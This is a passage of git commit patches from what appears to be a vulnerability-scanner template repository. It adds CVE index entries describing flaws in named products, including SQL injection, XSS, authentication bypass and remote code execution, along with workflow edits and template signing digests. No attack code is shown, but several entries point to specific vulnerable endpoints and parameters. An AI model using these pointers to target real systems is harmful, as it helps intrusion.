Injection","Severity":"critical","Description":"Hoteldruid v3.0.5 was discovered to contain a SQL injection vulnerability via the id_utente_log parameter at /hoteldruid/personalizza.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43374.yaml"} {"ID":"CVE-2023-43472","Info":{"Name":"MLFlow \u003c 2.8.1 - Sensitive Information Disclosure","Severity":"high","Description":"An issue in MLFlow versions 2.8.1 and before allows a remote attacker to obtain sensitive information via a crafted request to REST API.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-43472.yaml"} {"ID":"CVE-2023-43795","Info":{"Name":"GeoServer WPS - Server Side Request Forgery","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The OGC Web Processing Service (WPS) specification is designed to process information from any server using GET and POST requests. This presents the opportunity for Server Side Request Forgery. This vulnerability has been patched in version 2.22.5 and 2.23.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-43795.yaml"} +{"ID":"CVE-2023-44012","Info":{"Name":"mojoPortal v.2.7.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in mojoPortal v.2.7.0.0 allows a remote attacker to execute arbitrary code via the helpkey parameter in the Help.aspx component.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44012.yaml"} {"ID":"CVE-2023-4415","Info":{"Name":"Ruijie RG-EW1200G Router Background - Login Bypass","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 07161417 r483. It has been rated as critical. Affected by this issue is some unknown functionality of the file /api/sys/login. The manipulation leads to improper authentication. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-237518 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4415.yaml"} {"ID":"CVE-2023-44352","Info":{"Name":"Adobe Coldfusion - Cross-Site Scripting","Severity":"medium","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an unauthenticated attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-44352.yaml"} {"ID":"CVE-2023-44353","Info":{"Name":"Adobe ColdFusion WDDX Deserialization Gadgets","Severity":"critical","Description":"Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-44353.yaml"} @@ -2394,6 +2397,7 @@ {"ID":"CVE-2024-22319","Info":{"Name":"IBM Operational Decision Manager - JNDI Injection","Severity":"critical","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API. IBM X-Force ID: 279145.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-22319.yaml"} {"ID":"CVE-2024-22320","Info":{"Name":"IBM Operational Decision Manager - Java Deserialization","Severity":"high","Description":"IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization. By sending specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code in the context of SYSTEM. IBM X-Force ID: 279146.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-22320.yaml"} {"ID":"CVE-2024-22927","Info":{"Name":"eyoucms v.1.6.5 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-22927.yaml"} +{"ID":"CVE-2024-2330","Info":{"Name":"NS-ASG Application Security Gateway 6.3 - Sql Injection","Severity":"medium","Description":"A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. This affects an unknown part of the file /protocol/index.php. The manipulation of the argument IPAddr leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n","Classification":{"CVSSScore":"6.3"}},"file_path":"http/cves/2024/CVE-2024-2330.yaml"} {"ID":"CVE-2024-23334","Info":{"Name":"aiohttp - Directory Traversal","Severity":"high","Description":"aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-23334.yaml"} {"ID":"CVE-2024-2340","Info":{"Name":"Avada \u003c 7.11.7 - Information Disclosure","Severity":"medium","Description":"The Avada theme for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.11.6 via the '/wp-content/uploads/fusion-forms/' directory. This makes it possible for unauthenticated attackers to extract sensitive data uploaded via an Avada created form with a file upload mechanism.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-2340.yaml"} {"ID":"CVE-2024-23692","Info":{"Name":"Rejetto HTTP File Server - Template injection","Severity":"critical","Description":"This vulnerability allows a remote, unauthenticated attacker to execute arbitrary commands on the affected system by sending a specially crafted HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-23692.yaml"} @@ -2465,6 +2469,7 @@ {"ID":"CVE-2024-37032","Info":{"Name":"Ollama - Remote Code Execution","Severity":"critical","Description":"Ollama before 0.1.34 does not validate the format of the digest (sha256 with 64 hex digits) when getting the model path, and thus mishandles the TestGetBlobsPath test cases such as fewer than 64 hex digits, more than 64 hex digits, or an initial ../ substring.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37032.yaml"} {"ID":"CVE-2024-37152","Info":{"Name":"Argo CD Unauthenticated Access to sensitive setting","Severity":"medium","Description":"Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The vulnerability allows unauthorized access to the sensitive settings exposed by /api/v1/settings endpoint without authentication. All sensitive settings are hidden except passwordPattern.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37152.yaml"} {"ID":"CVE-2024-37393","Info":{"Name":"SecurEnvoy Two Factor Authentication - LDAP Injection","Severity":"critical","Description":"Multiple LDAP injections vulnerabilities exist in SecurEnvoy MFA before 9.4.514 due to improper validation of user-supplied input. An unauthenticated remote attacker could exfiltrate data from Active Directory through blind LDAP injection attacks against the DESKTOP service exposed on the /secserver HTTP endpoint. This may include ms-Mcs-AdmPwd, which has a cleartext password for the Local Administrator Password Solution (LAPS) feature.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37393.yaml"} +{"ID":"CVE-2024-3742","Info":{"Name":"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure","Severity":"high","Description":"Electrolink transmitters store credentials in clear-text. Use of these credentials could allow an attacker to access the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-3742.yaml"} {"ID":"CVE-2024-37881","Info":{"Name":"SiteGuard WP Plugin \u003c= 1.7.6 - Login Page Disclosure","Severity":"medium","Description":"The SiteGuard WP Plugin plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 1.7.6. This is due to the plugin not restricting redirects from wp-register.php which may disclose the login page URL. This makes it possible for unauthenticated attackers to gain access to the login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-37881.yaml"} {"ID":"CVE-2024-3822","Info":{"Name":"Base64 Encoder/Decoder \u003c= 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-3822.yaml"} {"ID":"CVE-2024-3922","Info":{"Name":"Dokan Pro \u003c= 3.10.3 - SQL Injection","Severity":"critical","Description":"The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-3922.yaml"} @@ -2475,8 +2480,10 @@ {"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"} {"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"} {"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"} +{"ID":"CVE-2024-4879","Info":{"Name":"ServiceNow UI Macros - Template Injection","Severity":"unknown","Description":"ServiceNow has addressed an input validation vulnerability that was identified in Vancouver and Washington DC Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. ServiceNow applied an update to hosted instances, and ServiceNow released the update to our partners and self-hosted customers. Listed below are the patches and hot fixes that address the vulnerability. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4879.yaml"} {"ID":"CVE-2024-4956","Info":{"Name":"Sonatype Nexus Repository Manager 3 - Local File Inclusion","Severity":"high","Description":"Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-4956.yaml"} {"ID":"CVE-2024-5084","Info":{"Name":"Hash Form \u003c= 1.1.0 - Arbitrary File Upload","Severity":"critical","Description":"The Hash Form Drag \u0026 Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5084.yaml"} +{"ID":"CVE-2024-5217","Info":{"Name":"ServiceNow - Incomplete Input Validation","Severity":"critical","Description":"ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5217.yaml"} {"ID":"CVE-2024-5230","Info":{"Name":"FleetCart 4.1.1 - Information Disclosure","Severity":"medium","Description":"Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the \"Razorpay\" \"razorpayKeyId\".\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-5230.yaml"} {"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"} {"ID":"CVE-2024-5947","Info":{"Name":"Deep Sea Electronics DSE855 - Authentication Bypass","Severity":"medium","Description":"Deep Sea Electronics DSE855 Configuration Backup Missing Authentication Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of Deep Sea Electronics DSE855 devices. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web-based UI. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-22679.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5947.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index c57eb974821..9fc4b47fbcc 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -d1f295df512d3eeba2ed9182053c6288 +58f28adddb059a43b0d499b154186d90 From 352a4720e141ff509feb7a9ede526ed8f4c77898 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 04:44:52 +0000 Subject: [PATCH 149/247] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 4017e734575..2592a9098f7 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,8 @@ on: - 'http/cves/2023/CVE-2023-44012.yaml' - 'http/cves/2024/CVE-2024-2330.yaml' - 'http/cves/2024/CVE-2024-3742.yaml' + - 'http/cves/2024/CVE-2024-4879.yaml' + - 'http/cves/2024/CVE-2024-5217.yaml' - 'http/exposed-panels/gradle/gradle-develocity-panel.yaml' - 'http/exposures/configs/snoop-servlet-exposure.yaml' - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' From e9c5ae4bf55814de8f80c2bbacb121a159cf8f36 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 04:45:55 +0000 Subject: [PATCH 150/247] Auto Template Signing [Mon Jul 15 04:45:55 UTC 2024] :robot: --- http/cves/2024/CVE-2024-4879.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-seopress.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 201 files changed, 201 insertions(+) diff --git a/http/cves/2024/CVE-2024-4879.yaml b/http/cves/2024/CVE-2024-4879.yaml index 133e72f7f3e..673df20aa50 100644 --- a/http/cves/2024/CVE-2024-4879.yaml +++ b/http/cves/2024/CVE-2024-4879.yaml @@ -46,3 +46,4 @@ http: - type: status status: - 200 +# digest: 4a0a0047304502205fffb19b088bd6aacae4eff5e3e51db761eda582f4957a4863f4865611e45f570221009cff96f5dc1de26ba5a1c59fb1b01f53e7232c87aaba8322b8439f45d687b9f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 3fd2256749a..1f058d7d22e 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203cfd657a163a51d6ea5d1ffcace355c3bbeac4b88e3f98ea005875c14ee6a446022100c281f7d2ca8628b2c9e03cbcac9fb2d89f1a37b04a98bdf15d8de42296ca8516:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6a0d344b632..c796735b9fa 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203bd1df3450f4408d403e3c8647a83f2d10f3e5a538fcbd739252b55912f3ad660220711d63a5c1740ea635f331f1b395e5a6162d424eb6355a034bbb4c81e6a20ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 6fb5080bc80..c9477056075 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b7c4c23e9b78175f133be8fb3a5b364077942891083eb47188644b8b193256102203475786d505db3a5cea85b2a68d2b8041f8e2c992cd3fc63ee3be7d0ad0e93f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 